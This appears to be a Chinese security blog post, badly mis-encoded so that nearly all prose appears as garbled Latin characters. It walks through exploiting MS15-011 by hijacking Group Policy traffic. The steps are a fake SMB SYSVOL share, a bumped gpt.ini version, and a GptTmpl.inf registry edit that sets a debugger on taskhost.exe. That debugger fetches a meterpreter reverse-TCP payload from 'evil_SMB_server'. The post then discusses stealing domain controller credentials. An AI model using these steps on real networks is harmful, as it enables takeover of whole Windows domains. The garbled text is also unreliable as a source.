˵ÔÚÇ°Ãæ
windows Domain ÖÐÎÄ·ÒëΪÓò£¬Óò¼ÈÊÇ Windows ÍøÂç²Ù×÷ϵͳµÄÂß¼×éÖ¯µ¥Ôª£¬Ò²ÊÇInternetµÄÂß¼×éÖ¯µ¥Ôª¡£ËüÊÇÓÉËùÓеÄÓû§¼ÆËã»ú£¬´òÓ¡»ú£¬Óû§ÕË»§ºÍÆäËûµÄ°²È«Ö÷Ìå×é³É£¬±»Óò¿ØÖÆÆ÷¹ÜÀí¡£
ÓòÊÇ΢ÈíÌṩ¸øÆóÒµµÄÒ»¸ö¾ÖÓòÍø¹ÜÀí´ëÊ©£¬Ê¹µÃÐÅÏ¢¼¼ÊõÈËÔ±ÄܸßЧµÄ¹ÜÀíºÍά»¤¾ÖÓòÍøÖÐËùÓеÄÖ÷»úºÍÓû§¡£ÓòλÓÚÿһ¸öÆóÒµ×îºËÐĵÄλÖã¬ÔÚÓòÉÏÔËÐÐ×Å´óÁ¿µÄÆóÒµºËÐÄÓ¦Óã¬ÈçÓʼþϵͳ£¬Ðͬ°ì¹«ÏµÍ³£¬Îļþ¹²ÏíϵͳµÈ¡£
ÔÚÍøÂçÉøÍ¸¹¥»÷ÖУ¬¹¥»÷ÕßÈç¹û»ñÈ¡ÁËÓòµÄȨÏÞ£¬ÄÇô¹¥»÷Õß¾ÍÓпÉÄÜ»ñÈ¡¹«Ë¾µÄ»úÃÜ£¬¿ØÖƹ«Ë¾µÄÒ»ÇС£ËùÒÔÓò°²È«ÊÇÆóÒµ°²È«×îΪºËÐĵÄÒ»¸ö»·½Ú£¬²¢ÇÒ΢Èí¶ÔÓò±¾ÉíÒ²ÔÚ½øÐв»¶ÏµÄ°²È«¼Ó¹Ì¡£
NSAй©µÄÎĵµºÍ¹¤¾ßÈÃÈËÃÇÃ÷°×ÁËÍøÂçµÄµ×²ãÉ豸ÊǶàôµÄ²»¿°Ò»»÷£¬µ«ÊDz¿·ÖÔËάÈËÔ±ºÍ°²È«ÈËÔ±ÈÔÈ»±§ÓлÃÏë£¬Ö»ÒªÑø³ÉÕýÈ·µÄ¼ÆËã»úʹÓÃϰ¹ß£¬²»°²È«µÄµ×²ãÍøÂçºÜÄÑÍþвµ½ÓòµÄ°²È«£¬µ«ÊÇÊÂʵÍùÍù²»ÊÇÕâÑù£¬WindowsÓò±¾ÉíÊ®·Ö´àÈõ£¬ÓÈÆäÊÇÔÚ²»°²È«µÄÍøÂç»·¾³ÖУ¬ÒòΪÓòÊÇ»ùÓÚÐÅÈεײãÍøÂç½øÐÐÉè¼ÆºÍ½¨ÔìµÄ¡£
±¾ÎĽ«ÀûÓÃÁíÍâÒ»ÖÖ·½·¨£¬Íê³É´Óµ×²ãÍøÂçÈëÇÖwindowsÓò¡£
ÔÀí·ÖÎö
µ±µ×²ãÍøÂç±»¹¥ÏÝ£¬¹¥»÷Õß¾ÍÄÜÇáÒ׵ĽٳÖÁ÷Á¿£¬Î±ÔìÍøÂç½Úµã¡£¶ø½Ù³ÖÁ÷Á¿¹¥»÷×î»ù±¾µÄÉè¼ÆË¼Â·¾ÍÊǽ¨Á¢ÔÚÒ»¸ö¼ÙÉèÖ®ÉÏ£¬Èç¹û½Ù³ÖÁËij¸öÉ豸£¬ÄܴﵽʲôĿµÄ¡£
Èç¹û½Ù³ÖÁËÓò¿Ø£¬ÄܴﵽʲôĿµÄ?
»ùÓÚÕâ¸ö¼ÙÉ裬½øÐÐÁËһϵÁвâÊÔ£¬ÄóöÆäÖÐÒ»¸ö²âÊÔÓë´ó¼Ò¹²Í¬Ñо¿¡£
ÔÚ΢ÈíµÄ¹ÙÍøÉÏÓÐÈçÏÂÃèÊö£º
×é²ßÂÔÊÇÔÚ»ùÓÚ Active Directory Óò·þÎñ (AD DS)
µÄÍøÂçÉÏ·ÃÎʺÍÅäÖüÆËã»ú¼°Óû§ÉèÖõÄ×îÇáËÉÒ×Ðеķ½Ê½¡£Èç¹ûÄúµÄÆóҵδÔÚʹÓÃ×é²ßÂÔ£¬ÄÇô½«»á´íʧ½µµÍ³É±¾¡¢¿ØÖÆÅäÖá¢Ê¹Óû§±£³Ö׿ÓгÉЧºÍÓäÔõÄÐÄÇéÒÔ¼°ÔöÇ¿°²È«ÐԵĴóºÃ»ú»á¡£¿ÉÒÔ½«Ê¹ÓÃ×é²ßÂÔ½øÐÐÅäÖÃÊÓΪ¡°Ò»¾Ù¶àµÃ¡±¡£
Óò¿ØÍ¨¹ý×é²ßÂÔÍê³É¶ÔÓòÄÚ»úÆ÷µÄ½øÐÐÅäÖõÄÒ»ÖÖ·½Ê½£¬windowsÓò»úÆ÷ÿ¼ä¸ôÒ»¶Îʱ¼ä¾Í»áÏòÓò¿ØÖÆÆ÷ÇëÇó¸üÐÂ×é²ßÂÔ£¬ÒÔ±£Ö¤×ÔÉíʹÓÃ×Å×îеÄÓò²ßÂÔ¡£¸üеĹý³ÌÊÇ£¬Óò³ÉÔ±»úÆ÷ÿ¼ä¸ô
90min+random()*30min £¬ÏòÓò¿ØÇëÇó²ßÂÔ°æ±¾ºÅ£¬Õâ¸ö°æ±¾ºÅ´æÔÚÓÚÓò¿ØµÄgpt.iniÎļþÖУ¬Î»ÓÚ
\\domian_name\sysvol\domain_name\Policies? |
Îļþ¼ÐÖУ¬ÎļþÄÚÈÝΪ£º
Õâ¸ö°æ±¾ºÅÈç¹ûµÈÓÚ×ÔÉí°æ±¾ºÅ£¬ÄÇôϵͳ¾ÍÈÏΪ×ÔÉí×é²ßÂÔÊÇ×îа汾¡£È»ºóÖØÖüÆÊ±Æ÷£¬µÈ´ýÏÂÒ»¸ö¼ä¸ôÈ¥ÇëÇó¸üС£
ÏêϸÊý¾Ý°üÇëÇó¹ý³ÌÈçÏÂͼ£º

Èç¹û×ÔÉí°æ±¾ºÅСÓÚ·µ»ØµÄ°æ±¾ºÅ£¬ÄÇôϵͳÈÏΪ×ÔÉí×é²ßÂÔÒÔ¹ýʱ£¬¾Í¼ÌÐøÇëÇóregistry.pol
ºÍGptTmpl.iniÎļþ£¬ÏêϸÊý¾Ý°üÇëÇó¹ý³ÌÈçÏÂͼ£º

¶øGptTmpl.infÎļþ£¬ÊÇÒ»¸öÄ£°æÎļþ£¬ÔÊÐíÔ¶³ÌÐÞ¸ÄÓò³ÉÔ±µÄ×¢²á±í¡£
Èç¹û½Ù³Ö²¢ÇÒÐÞ¸ÄÁËGptTmpl.infÎļþ£¬¾Í¿ÉÒÔËæÒâÐÞ¸ÄÇëÇó¸ÃÎļþÓò³ÉÔ±µÄ×¢²á±í¡£ÀûÓýٳָÃÎļþÈëÇÖÓòµÄÒ»ÖÖ·½Ê½¾ÍÊÇÐÞ¸Ä×¢²á±í¸øÓò»úÆ÷Ìí¼ÓÆô¶¯ÏµÈµ½»úÆ÷ÖØÆôʱ£¬¾Í¿ÉÒÔÔËÐÐÖ¸¶¨Îļþ»òÕ߽ű¾¡£
µ«ÊÇÃæÁÙ×ÅÒ»¸öÎÊÌ⣬±ØÐëµÈµ½¸Ã»úÆ÷ÖØÐÂÆô¶¯¡£¸Ã»úÆ÷¿ÉÄÜÆô¶¯ÖÜÆÚºÜ³¤£¬¹¥»÷Õߵįô¶¯½Å±¾»ò¹¥»÷payload´æ´¢µÄλÖþͱØÐë³ÖÐø±£³Ö£¬ºÜ²»·½±ã¡£Ö®Ç°CoreSecurityµÄ²âÊÔPOCʱÐÞ¸ÄAppInit_DLL×¢²á±í¼üÖµ£¬µ«ÊÇÕâ¸ö¼üÖµÒѾ²»ÆôÓúܶàÄêÁË¡£ËùÒÔÐèÒªÒ»¸ö¼ò±ã¸ßЧµÄ·½Ê½¡£ÔÙ¾¹ý¶àÖÖÀûÓòâÊÔÖ®ºó£¬ÖÕÓÚÕÒµ½Ò»Öַdz£ºÃÓõķ½Ê½£¬Ò»¸öÉñÆæµÄ×¢²á±í¼üÖµ£º
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution optin] |
ͨ¹ýÐÞ¸ÄÕâ¸ö¼üÖµ£¬¿ÉÒÔ¸øÈÎÒ»windows³ÌÐòÌí¼ÓÒ»¸ödebuggerµ÷ÊÔÆ÷¡£ÀýÈç¿ÉÒÔ¸øcmd.exeÌí¼ÓÒ»¸öµ÷ÊÔÆ÷debugger.exe£¬ÕâÑùÄãÔÚÆô¶¯cmd.exe
µÄʱºò£¬Êµ¼ÊÔËÐеÄΪ£º
ͨ¹ýÕâÖÖ·½Ê½£¬¿ÉÒÔ¸øIE£¬Chrome»òÕ߯äËûʲôÓû§¿ÉÄÜ»áÔËÐеijÌÐòÌí¼ÓÒ»¸öµ÷ÊÔÆ÷£¬ÕâÖÖ·½Ê½Ã÷ÏÔ»á±ÈµÈ´ýÓû§ÖØÆôҪѸËٵĶࡣ
¼´Ê¹ÊÇÔÚÓû§È¨ÏÞÊÜÏÞÖÆµÄÇé¿öÏ£¬ÒÀÈ»¿ÉÒÔͨ¹ý×é²ßÂԽٳֵķ½Ê½À´¶Ô¸Ã»úÆ÷µÄ×¢²á±í½øÐÐÐ޸ġ£µ«ÊÇÔÚ½Ù³ÖÍê³ÉÖ®ºó£¬±ØÐë¶Ô×¢²á±í½øÐÐÇåÀí£¬ÒòΪ¸Ãµ÷ÊÔ³ÌÐò²»¿ÉÄܳ¤¾Ã´æÔÚ£¬ÄÇô֮ºóÓû§¿ÉÄÜÎÞ·¨Æô¶¯¸Ã³ÌÐò¡£²¢ÇÒÐ޸ļüÖµÐèÒª¹ÜÀíԱȨÏÞ¡£
ΪÁ˱ÜÃâ²Â´íÓû§Ê¹ÓõijÌÐòºÍ½Ï³¤µÄµÈ´ýʱ¼ä£¬¾¹ý¶à´Î²âÊÔÕÒµ½ÁËÒ»¸ö¸üºÃµÄ½â¾ö°ì·¨¡£ÏµÍ³ÔÚ¸üÐÂ×é²ßÂÔÖ®ºó£¬»áÓÃϵͳȨÏÞ´´½¨Ò»¸öеĽø³Ì
taskhost.exe £¬¼´Ê¹¸ÃÓû§´¦ÓÚÒ»¸öÊÜÏÞÖÆµÄ״̬¡£ËùÒÔ¸øtaskhost.exe³ÌÐò´´½¨Ò»¸öµ÷ÊÔÆ÷£¬ÕâÑù¾ÍÄÜÔÚϵͳ¸üÐÂÍê´Ö²ßÂÔºóÁ¢¿Ì»ñȡһ¸ösystemȨÏÞµÄshell¡£²»ÐèÒªÂþ³¤µÄµÈ´ý£¬²»ÐèÒªÖØÆô£¬²»ÐèÒªÓû§µÄÈκβÙ×÷£¬Ò»Çж¼ÊǾ²Ä¬ÖÐÍê³É¡£
µ±È»£¬ÕâÖÖ½Ù³Ö×é²ßÂÔÖ´ÐÐÃüÁîµÄ·½Ê½ºÜÔçµÄʱºò¾Í±¨¸æ¸øÁËMicrosoft£¬²¢ÇÒÔÚ2015Äê2ÔÂ10Èվͷ¢²¼°²È«¹«¸æ
MS15-011²¢ÌṩÁ˲¹¶¡KB3000483¡£Î¢Èí¾ö¶¨ÔÚÓû§¶ËÐÞ¸´Õâ¸ö©¶´£¬Ç¿ÖÆÊ¹Óá°SMB Signing¡±¡£
µ«ÊÇ£¬ËäÈ»Õâ¸ö©¶´ÔÚÒ»Äê¶àǰ¾ÍÒѾ·¢²¼°²È«¹«¸æ£¬²¢ÇÒÌṩÁËÏà¹Ø²¹¶¡£¬µ«ÊÇÕâ¸ö²¹¶¡ÊÇĬÈϲ»ÆôÓõġ£
ÔÚ΢ÈíµÄ¹Ù·½¹«¸æÖÐÓÐÕâÑùÒ»¶Î»°£º
This security update requires the following
steps to be performed in order to protect against the
vulnerability described in the bulletin (MS15-011).
To enable this functionality, a system administrator
must apply the following Group Policy settings in addition
to installing security update 3000483.
Æäº¬ÒåÊÇ£º
ϵͳ¹ÜÀíÔ±±ØÐëÊÖ¶¯ÅäÖÃ×é²ßÂÔ£¬ÆôÓá°UNC Hardened Access¡±À´±ÜÃâMS15-011©¶´Ëù´øÀ´µÄ°²È«·çÏÕ¡£ÏêϸµÄÅäÖòßÂÔÔÚ΢ÈíµÄ¹Ù·½ÍøÕ¾£¬¼òµ¥×ܽá³ÉÁË12¸ö²½Öè£¬ÍøÒ³Á´½ÓÈçÏ£º
https://support.microsoft.com/en-us/kb/3000483
΢ÈíÈÏΪÕâÊÇÒ»¸ö©¶´£¬²¢ÇÒÌṩÁËÏà¹ØµÄ²¹¶¡¡£µ«ÊÇÕâ¸ö²¹¶¡²¢²»ÊÇĬÈÏÆôÓ㬱ØÐë¹ÜÀíÔ±ÊÖ¶¯ÅäÖÃ12¸ö²½Öè²ÅÄÜÆôÓá£
ËùÒԸé¶´´ó¶àÊý»·¾³ÖÐÒÀÈ»¿ÉÒÔ±»µ±×÷0DAYÀ´Ê¹Óá£
²âÊÔ
ʵÑé²âÊÔ²½ÖèÈçÏ£º
1. ×¼±¸´æ·ÅpayloadµÄSMB·þÎñÆ÷ºÍÏàÓ¦µÄpayload
ÔڸòâÊÔÖУ¬ÔÚ¹¥»÷Õß»úÆ÷ÉÏÆôÓÃÁËSMB¹²Ïí£¬´´½¨Ò»¸öÓ³ÉäΪSYSVOLµÄĿ¼£¬ÃüÁîÈçÏ£º
net?share?sysvol=C:\Users\TEST\Desktop\sysvol? |
»òÕßÖ±½ÓʹÓýçÃæ¿ªÆô¹²Ïí£¬Ð§¹ûÒ»Ñù¡£ÔÚÎļþ¼ÐÖд´½¨Ê÷Ðνṹ£¬ÒòΪÓò»úÆ÷ÔÚÇëÇó¸üеÄʱºòÖ»»áÇëÇó¹Ì¶¨Î»ÖõÄÎļþ¡£Îļþ½á¹¹ÈçÏ£º
©¤Domain_Name ©¸©¤Policies ©¸©¤{31B2F340-016D-11D2-945F-00C04FB984F9} ©¦ gpt.ini ©¦ ©¸©¤Machine ©¸©¤Microsoft ©¸©¤Windows NT ©¸©¤SecEdit GptTmpl.inf |
È»ºó¿ªÆôÕû¸öÎļþ¼ÐµÄÄäÃû¹²Ïí£¬ÔÊÐíÈκÎÈË·ÃÎÊ¡£
×¼±¸payload³ÌÐò£¬±¾²âÊÔ×¼±¸µÄÊÇmeterpreter_resver_tcp.exe£¬ÖØÃüÃûΪdebugger.exe¡£
ÒòΪ½Ù³Ö·½Ê½²»Ò»Ñù£¬Èç¹ûÑ¡ÔñÖ±½ÓÐÞ¸ÄÊý¾Ý°üÄÚÈÝ»òÕßÖØÐ»ذü£¬¿ÉÒÔ²»Óô´½¨Ê÷ÐνṹĿ¼£¬µ«ÊÇSMBµÄÄäÃû¹²ÏíÎļþ¼ÐÊÇÐèÒªµÄ£¬ÓÃÀ´´æ·Åpayload¡£
2. ½Ù³ÖÖÐÐèÒªÐ޸ĵÄÊý¾Ý
Ê×ÏÈÐÞ¸ÄGpt.iniÎļþ£¬½«ÆäÖеİ汾ºÅ¸ÄΪһ¸ö½Ï´óÊý×Ö£¬·½±ãÆð¼û¸ÄΪ1000£¬ÈçÏ£º
È»ºóÐ޸IJßÂÔÎļþGptTmpl.ini£¬ÎļþÔÄÚÈÝÈçÏ£º
[Unicode] Unicode=yes [System Access] MinimumPasswordAge = 1 MaximumPasswordAge = 42 MinimumPasswordLength = 7 PasswordComplexity = 1 PasswordHistorySize = 24 LockoutBadCount = 0 RequireLogonToChangePassword = 0 ForceLogoffWhenHourExpire = 0 ClearTextPassword = 0 LSAAnonymousNameLookup = 0 [Kerberos Policy] MaxTicketAge = 10 MaxRenewAge = 7 MaxServiceAge = 600 MaxClockSkew = 5 TicketValidateClient = 1 [Registry Values] MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1 [Version] signature="$CHICAGO$" Revision=1 |
È»ºó°´ÕÕÉè¼Æ½øÐÐÏàÓ¦µÄÐ޸쬼ò±ãÆð¼û£¬Ö»Ìí¼ÓÐÞ¸Ä×¢²á±íÏÐ޸ĺóµÄÎļþÄÚÈÝÈçÏ£º
[Registry Values] MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,
\\evil_SMB_server\sysvol\admin.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
\Machine\Microsoft\Windows NT\SecEdit\muma_test.exe [Version] signature="$CHICAGO$" Revision=1 |
½«¡°evil_SMB_server¡±Ìæ»»³É·ÅÖÃpayloadµÄ·þÎñÆ÷µØÖ·£¬½«¡°debugger.exe¡±Ìæ»»³ÉpayloadÎļþ¡£
3. ¿ªÊ¼¹¥»÷
½Ù³ÖÁ÷Á¿µ½attackerÉÏ¡£ÔÚÕâÀï½Ù³ÖÁ÷Á¿µÄ·½Ê½¶àÖÖ¶àÑù£¬LLMNR,£¬NBT-NS £¬MDNS£¬ARP£¬bad_tunnelµÈµÈµÈʲô¶¼ÐУ¬ÓÐÒ»¿îºÜºÃÓõÄÈí¼þ£¬½Ð×öResponder
github£¬µ«ÊDZ¾´ÎÊÔÑéÊÇרÃÅÕë¶Ô·ÓÉÆ÷Á÷Á¿½Ù³Ö¶¨ÖƵijÌÐòÀ´Íê³ÉËùÓвÙ×÷¡£
Ê×ÏÈ£¬client»átreeÒ»ÏÂÕû¸öÎļþ¼Ð£¬È»ºóÇëÇóGpt.ini£¬¶Ô±È°æ±¾ºÅ£¬È»ºó¼ÌÐøÇëÇóGptTmpl.iniÎļþ£¬½«ÎļþÖеÄ×¢²á±íÄ£°æÓ¦Óõ½×¢²á±íÖС£Ó¦Óóɹ¦Ö®ºó£¬ÏÂÔØ²¢ÒÔdebugger.exe×÷Ϊµ÷ÊÔÆ÷Æô¶¯taskhost.exe³ÌÐò£¬
È»ºóÉԵȼ¸Ã룺


done
»ñÈ¡ÁËһ̨»úÆ÷µÄ×î¸ß¿ØÖÆÈ¨ÏÞ¡£
×î¶àµÈ´ý120min£¬¾Í¿ÉÒÔ»ñÈ¡µ½Õû¸öÓò»úÆ÷µÄ×î¸ßȨÏÞ¡£³ýÁËÓò¿ØÖÆÆ÷£¬ÒòΪÓò¿ØÖÆÆ÷²»»áÇëÇó¸üÐÂ×é²ßÂÔ¡£µ½ÄÇʱÈç¹ûÓòÖÐÓжà¸öÓò¿ØÖÆÆ÷£¬ËüÃÇÖ®¼ä»áÇëÇó¸üÐÂ×é²ßÂÔ£¬Í¬Ñù¿ÉÒÔ±»½Ù³Ö¡£
³ýÁËÓò¿ØÍâµÄËùÓÐÉ豸¶¼»ñÈ¡ÁË¿ØÖÆÈ¨ÏÞ£¬ÒѾ»ù±¾¿ÉÒÔÔÚÓòÖг©ÐÐÎÞ×èÁË¡£
Õë¶ÔÓò¿Ø£¬Ö»ÄÜʹÓÃͨ¹ý×é²ßÂÔ´´½¨Ìæ»»µÇ¼½Å±¾£¬Ìí¼ÓÆô¶¯ÏîµÈ·½·¨ÖеÄÒ»ÖÖ¡£ÔÙ»òÕߣ¬Í¨¹ý×é²ßÂÔÌí¼ÓµÇ¼½Å±¾£¬ÐÞ¸Ä×¢²á±íUseLogonCredentialµÄ¼üÖµ£¬µÈ»úÆ÷Íê³ÉÖØÆô¾ÍÄÜÅúÁ¿×¥È¡Óû§ÃÜÂ룬ÒòΪÓò¹ÜÀíÔ±²»¿ÉÄÜÖ»ÔÚÓò¿ØÉϵǼ¡£
»òÕßʹÓÃÆäËûµÄ¸üºÃµÄ·½·¨ £¬ÈçÓкõÄ˼·£¬Çë˽ÐÅÎÒ£¬¿ÉÒÔ¹²Í¬ÌÖÂÛ²âÊÔ¡£
ÕâÑù¾Í»ñÈ¡µ½ÁËÕû¸öÓòµÄ¿ØÖÆÈ¨ÏÞ¡£
×ܽá
µ×²ãÍøÂçÉ豸ºÜΣÏÕ£¬²¢ÇҵײãÍøÂçÄܸøÉϲãÓ¦ÓúͷþÎñ´øÀ´ÄÑÒÔÏëÏóµÄÓ°Ïì¡£Ö»ÊÇÏÖÔڵݲȫȦ×ÓûÓÐÉî¿ÌÈÏʶµ½¡£ |